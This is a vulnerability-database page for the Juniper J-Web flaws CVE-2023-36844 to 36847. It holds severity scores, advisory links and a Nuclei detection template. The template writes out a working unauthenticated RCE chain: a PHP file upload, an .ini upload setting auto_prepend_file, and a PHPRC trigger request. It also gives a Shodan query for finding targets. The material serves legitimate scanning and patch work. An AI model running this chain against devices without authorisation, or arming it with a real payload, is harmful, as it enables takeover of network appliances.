Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2023-36844
HistoryAug 26, 2023 - 7:36 a.m.

Juniper Devices - Remote Code Execution

2023-08-2607:36:41
ProjectDiscovery
github.com
22
juniper
php
rce
packetstorm
fileupload
cve2023
intrusive

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.1

Confidence

Low

EPSS

0.962

Percentile

99.5%

JSON
Multiple cves in Juniper Network (CVE-2023-36844CVE-2023-36845CVE-2023-36846CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.

id: CVE-2023-36844

info:
  name: Juniper Devices - Remote Code Execution
  author: princechaddha,ritikchaddha
  severity: medium
  description: |
    Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Juniper Devices.
  remediation: |
    Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability.
  reference:
    - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
    - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844
    - https://supportportal.juniper.net/JSA72300
    - http://packetstormsecurity.com/files/174397/Juniper-JunOS-SRX-EX-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-36844
    cwe-id: CWE-473
    epss-score: 0.74086
    epss-percentile: 0.98118
    cpe: cpe:2.3:h:juniper:srx100:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: juniper
    product: srx100
    shodan-query: title:"Juniper Web Device Manager"
  tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev
variables:
  string: "CVE-2023-36844"
  payload: "('<?php echo md5('{{string}}');unlink(__FILE__);?>')"

http:
  - raw:
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=do_upload&rsargs[]=[{"fileData": "data:text/html;base64,{{base64(payload)}}", "fileName": "{{rand_base(5, "abc")}}.php", "csize": {{len(payload)}}}]
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=do_upload&rsargs[]=[{"fileName": "{{rand_base(5, "abc")}}.ini", "fileData": "data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}", "csize": "97" }]
      - |
        GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"original_fileName":'
          - '"converted_fileName":'
        condition: and

      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'

    extractors:
      - type: regex
        part: body_1
        name: phpfile
        regex:
          - "([a-f0-9]{64}\\.php)"
        internal: true

      - type: regex
        part: body_2
        name: inifile
        regex:
          - "([a-f0-9]{64}\\.ini)"
        internal: true
# digest: 490a00463044022050c0c86d37adc93f15483be39ba88b4ef0b2147733b63f599775bb98e8b82e5702202f3f2ce3ef76d2946847a13a8badb6ce89120b87a6559d7b4e4187a798e29c70:922c64590222798bb761d5b6d8e72950

Related

attackerkb 4
rapid7blog 2
thn 5
nessus 2
zdt 2
packetstorm 2
nuclei 1
metasploit 1
githubexploit 21
cisa_kev 4
cve 4
cvelist 4
prion 4
nvd 4
cnvd 1
exploitdb 1
impervablog 1
avleonov 1
attackerkb
attackerkb
CVE-2023-36844
2023-08-17 00:00:00
CVE-2023-36845
2023-08-17 00:00:00
CVE-2023-36847
2023-08-17 00:00:00
rapid7blog
rapid7blog
Exploitation of Juniper Networks SRX Series and EX Series Devices
2023-08-31 20:23:59
Metasploit Weekly Wrap Up
2023-10-06 18:10:13
thn
thn
New Juniper Junos OS Flaws Expose Devices to Remote Attacks - Patch Now
2023-08-19 07:38:00
Nearly 12,000 Juniper Firewalls Found Vulnerable to Recently Disclosed RCE Vulnerability
2023-09-19 09:30:00
CISA Sets a Deadline - Patch Juniper Junos OS Flaws Before November 17
2023-11-14 06:03:00
nessus
nessus
Juniper Junos OS Pre-Auth RCE (JSA72300)
2023-08-25 00:00:00
Juniper Junos OS Pre-Auth RCE (JSA72300)
2023-12-08 00:00:00
zdt
zdt
Juniper SRX Firewall / EX Switch Remote Code Execution Exploit
2023-10-02 00:00:00
Juniper SRX Firewalls&EX switches - PreAuth Remote Code Execution Exploit
2024-02-05 00:00:00
packetstorm
packetstorm
Juniper SRX Firewall / EX Switch Remote Code Execution
2023-10-02 00:00:00
Juniper SRX Firewall / EX Switch Remote Code Execution
2024-02-02 00:00:00
nuclei
nuclei
Juniper J-Web - Remote Code Execution
2023-09-19 01:54:05
metasploit
metasploit
Junos OS PHPRC Environment Variable Manipulation RCE
2023-09-20 20:47:05
githubexploit
githubexploit
Exploit for PHP External Variable Modification in Juniper Junos
2023-08-25 07:28:06
Exploit for PHP External Variable Modification in Juniper Junos
2023-09-27 23:56:07
Exploit for PHP External Variable Modification in Juniper Junos
2023-09-24 13:30:09
cisa_kev
cisa_kev
Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability
2023-11-13 00:00:00
Juniper Junos OS EX Series Missing Authentication for Critical Function Vulnerability
2023-11-13 00:00:00
Juniper Junos OS EX Series PHP External Variable Modification Vulnerability
2023-11-13 00:00:00
cve
cve
CVE-2023-36846
2023-08-17 20:15:10
CVE-2023-36847
2023-08-17 20:15:10
CVE-2023-36844
2023-08-17 20:15:10
cvelist
cvelist
CVE-2023-36846 Junos OS: SRX Series: A vulnerability in J-Web allows an unauthenticated attacker to upload arbitrary files
2023-08-17 19:18:00
CVE-2023-36847 Junos OS: EX Series: A vulnerability in J-Web allows an unauthenticated attacker to upload arbitrary files
2023-08-17 19:16:53
CVE-2023-36844 Junos OS: EX Series: A PHP vulnerability in J-Web allows an unauthenticated attacker to control important environment variables
2023-08-17 19:17:47
prion
prion
Authentication flaw
2023-08-17 20:15:00
Authentication flaw
2023-08-17 20:15:00
Code injection
2023-08-17 20:15:00
nvd
nvd
CVE-2023-36846
2023-08-17 20:15:10
CVE-2023-36847
2023-08-17 20:15:10
CVE-2023-36844
2023-08-17 20:15:10
cnvd
cnvd
Juniper Networks Junos OS EX Access Control Error Vulnerability
2023-08-19 00:00:00
exploitdb
exploitdb
Juniper-SRX-Firewalls&amp;EX-switches - (PreAuth-RCE) (PoC)
2024-02-02 00:00:00
impervablog
impervablog
Recent Vulnerabilities in Popular Applications Blocked by Imperva
2023-10-11 22:46:45
avleonov
avleonov
August 2023: GitHub PoCs, Vulristics, Qualys First-Party, Tenable ExposureAI, SC Awards and Rapid7, Anglo-Saxon list, MS Patch Tuesday, WinRAR, Juniper
2023-08-30 16:15:31

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.1

Confidence

Low

EPSS

0.962

Percentile

99.5%

JSON
Related for NUCLEI:CVE-2023-36844
attackerkb4rapid7blog2thn5nessus2zdt2packetstorm2nuclei1metasploit1githubexploit21cisa_kev4cve4cvelist4prion4nvd4cnvd1exploitdb1impervablog1avleonov1